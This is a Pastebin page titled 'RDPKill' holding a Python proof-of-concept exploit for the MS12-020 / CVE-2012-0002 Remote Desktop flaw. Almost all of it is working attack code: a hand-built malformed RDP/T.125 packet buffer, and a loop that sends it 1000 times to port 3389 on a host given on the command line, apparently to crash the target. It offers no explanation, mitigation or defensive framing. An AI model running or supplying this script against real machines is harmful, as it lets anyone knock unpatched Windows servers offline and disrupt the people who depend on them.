Guest User

RDPKill

a guest
Nov 22nd, 2013
1,726
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.    
  2.  
  3.     # MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept
  4.     # BlackBap.Org
  5.      
  6.     import socket
  7.     import sys
  8.      
  9.      
  10.     buf=""
  11.     buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19
  12.     buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224
  13.     buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470
  14.     buf+="\x02\xf0\x80" # ITU-T Rec X.224
  15.     buf+="\x7f\x65\x82\x01\x94\x04" #MULTIPOINT-COMMUNICATION-SERVICE T.125
  16.      
  17.     buf+="\x01\x01\x04\x01\x01\x01\x01\xff" # "Fuck you Chelios" packet
  18.     buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
  19.     buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
  20.     buf+="\x00\x00\x00\x00\x02\x04\x00\x00"
  21.     buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
  22.     buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
  23.     buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
  24.     buf+="\x30\x19\x02\x04\x00\x00\x00\x01"
  25.     buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
  26.     buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
  27.     buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
  28.     buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
  29.     buf+="\x04\x20\x02\x04\x00\x00\x00\x02"
  30.     buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
  31.     buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
  32.     buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
  33.     buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
  34.     buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
  35.     buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
  36.     buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"
  37.     buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
  38.     buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
  39.     buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
  40.     buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
  41.     buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"
  42.     buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
  43.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  44.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  45.     buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
  46.     buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"
  47.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  48.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  49.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  50.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  51.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  52.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  53.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  54.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  55.     buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
  56.     buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
  57.     buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
  58.     buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
  59.     buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
  60.     buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
  61.     buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
  62.     buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
  63.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  64.     buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  65.     buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
  66.     buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
  67.     buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
  68.     buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"
  69.     buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
  70.     buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
  71.     buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
  72.     buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
  73.     buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
  74.     buf+="\xc0"
  75.      
  76.     buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  77.     buf+="\x02\xf0\x80"  # ITU-T Rec X.224
  78.     buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125
  79.     buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8
  80.     buf+="\x02\xf0\x80" # ITU-T Rec X.224
  81.     buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125
  82.     buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  83.     buf+="\x02\xf0\x80" # ITU-T Rec X.224
  84.     buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125
  85.     buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  86.     buf+="\x02\xf0\x80" #ITU-T Rec X.224
  87.     buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125
  88.     buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  89.     buf+="\x02\xf0\x80" #ITU-T Rec X.224
  90.     buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125
  91.     buf+="\x03\x00\x00\x0c"  # TPKT, Version 3, Lenght 12
  92.     buf+="\x02\xf0\x80" #ITU-T Rec X.224
  93.     buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125
  94.     buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  95.     buf+="\x02\xf0\x80" #ITU-T Rec X.224
  96.     buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125
  97.     buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12
  98.     buf+="\x06\xd0\x00\x00\x12\x34\x00"  #ITU-T Rec X.224
  99.      
  100.     HOST = sys.argv[1]
  101.     PORT = 3389
  102.     for i in range(1000):
  103.      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  104.      s.connect((HOST,PORT))
  105.      print "sending: %d bytes" % len(buf)
  106.      s.send(buf)
  107.      rec = s.recv(100)
  108.      print "received: %d bytes" % len(rec)
  109.      s.close()
  110.     # BlackBap.Org
RAW Paste Data